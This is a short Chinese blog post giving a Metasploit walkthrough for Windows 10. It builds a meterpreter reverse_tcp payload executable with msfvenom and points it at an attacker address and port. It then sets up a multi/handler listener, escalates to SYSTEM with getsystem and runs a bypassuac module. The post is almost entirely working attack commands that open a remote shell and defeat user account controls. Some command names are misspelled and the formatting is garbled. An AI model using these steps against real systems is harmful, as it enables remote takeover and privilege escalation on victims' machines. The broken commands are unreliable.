Windows10 bypassuac 提權(quán)

一、 遠(yuǎn)控

????a) X86

????????msfvnom –p payload/windows/meterpreter/reverse_tcp ? ? ? ? ??# 32位

????????msfvnom –p payload/windows/x64/meterpreter/reverse_tcp????# 64位

????????i. LHOST=192.168.135.129 #指定反彈shell地址

????????ii. LPORT=4444 #指定反彈shell端口

????????iii. –f exe #生成文件類型

????????iv. –o /root/DeskTop/name.exe #生成路徑及文件名

二、 建立會(huì)話

????a) use exploit/multi/handler

? ? ????set payload windows/x64/meterpreter/reverse_tcp

????????set payload windows/meterpreter/reverse_tcp

????????i. set LHOST 192.168.135.129 #監(jiān)聽(tīng)地址

????????ii. set LPORT 4444 #監(jiān)聽(tīng)端口

????????iii. exploit / run #執(zhí)行

????????iv. background #掛起會(huì)話

三、 提權(quán)

????a) 命令(進(jìn)入會(huì)話)

????????getuid #獲取用戶id

????????getsystem #獲取sys權(quán)限

????????????1. –t 0 # 所有可用的技術(shù)(1,2,3)

????????????2. –t 1 # 命名管道模擬(在內(nèi)存/管理中)

????????????3. –t 2 # 被命名為管道模擬(下拉/admin)

????????????4. –t 3 # 標(biāo)記重復(fù)(在內(nèi)存/管理中)

????????search bypassuac

????b) 使用bypassuac(繞過(guò)用戶帳戶控制)


????????set payload windows/x64/meterprese/reverse_tcp

? ? ????set target 1 #設(shè)置目標(biāo)為x64,0:x86

本文連接:http://www.itdecent.cn/p/11284bb8e231

版權(quán)聲明:本文為簡(jiǎn)友原創(chuàng)文章,轉(zhuǎn)載必須寫明出處。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容